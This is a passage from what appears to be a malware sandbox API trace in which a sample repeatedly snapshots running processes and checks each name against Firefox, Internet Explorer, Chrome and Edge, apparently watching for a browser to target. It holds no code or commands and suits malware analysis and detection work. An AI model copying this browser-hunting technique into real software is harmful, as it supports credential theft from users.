th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.812] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.812] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.812] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.812] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0167.812] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0167.812] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0167.812] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0167.812] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0167.813] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0167.813] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0167.813] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0167.813] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.813] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0167.814] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0167.814] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0167.814] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0167.814] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0167.814] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0167.814] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0167.814] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0167.814] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0167.815] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0167.815] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0167.815] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0167.815] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0167.815] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0167.815] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0167.815] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0167.815] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0167.816] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0167.816] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0167.816] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0167.816] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.816] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0167.817] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0167.817] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0167.817] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0167.817] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0167.817] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0167.817] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0167.817] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0167.817] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0167.818] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0167.818] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0167.818] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0167.818] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0167.819] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0167.819] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0167.819] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0167.819] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0167.819] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0167.819] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0167.819] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0167.819] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0167.820] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0167.820] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0167.820] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0167.820] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0167.821] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0167.821] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0167.821] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0167.821] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0167.821] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0167.821] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0167.821] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0167.821] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0167.822] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0167.822] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0167.822] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0167.822] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0167.822] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0167.822] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0167.822] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0167.822] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0167.823] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0167.823] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0167.823] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0167.823] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0167.824] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0167.824] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0167.824] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0167.824] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0167.824] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0167.824] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0167.824] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0167.824] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0167.825] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0167.825] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0167.825] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0167.825] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0167.825] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0167.825] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0167.825] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0167.825] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0167.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0167.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0167.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.827] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.827] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.827] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.827] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0167.827] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0167.827] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0167.827] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0167.827] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.828] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.828] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.828] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.828] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0167.828] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0167.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0167.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0167.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.829] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.829] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.829] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.829] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.830] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0167.830] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0167.830] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0167.830] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0167.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0167.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0167.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0167.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.831] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0167.831] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0167.831] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0167.831] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.831] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.831] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0167.831] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0167.832] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0167.832] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.832] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0167.832] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0167.832] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0167.832] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.833] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0167.833] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0167.833] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0167.833] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.980] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0167.980] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.980] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0167.981] CloseHandle (hObject=0xd4) returned 1 [0167.981] Sleep (dwMilliseconds=0x3e8) [0169.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0169.119] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.120] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0169.120] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0169.120] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0169.120] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0169.120] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0169.121] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0169.121] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0169.121] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0169.121] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0169.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0169.121] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0169.121] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0169.121] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0169.121] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.121] Process32Next 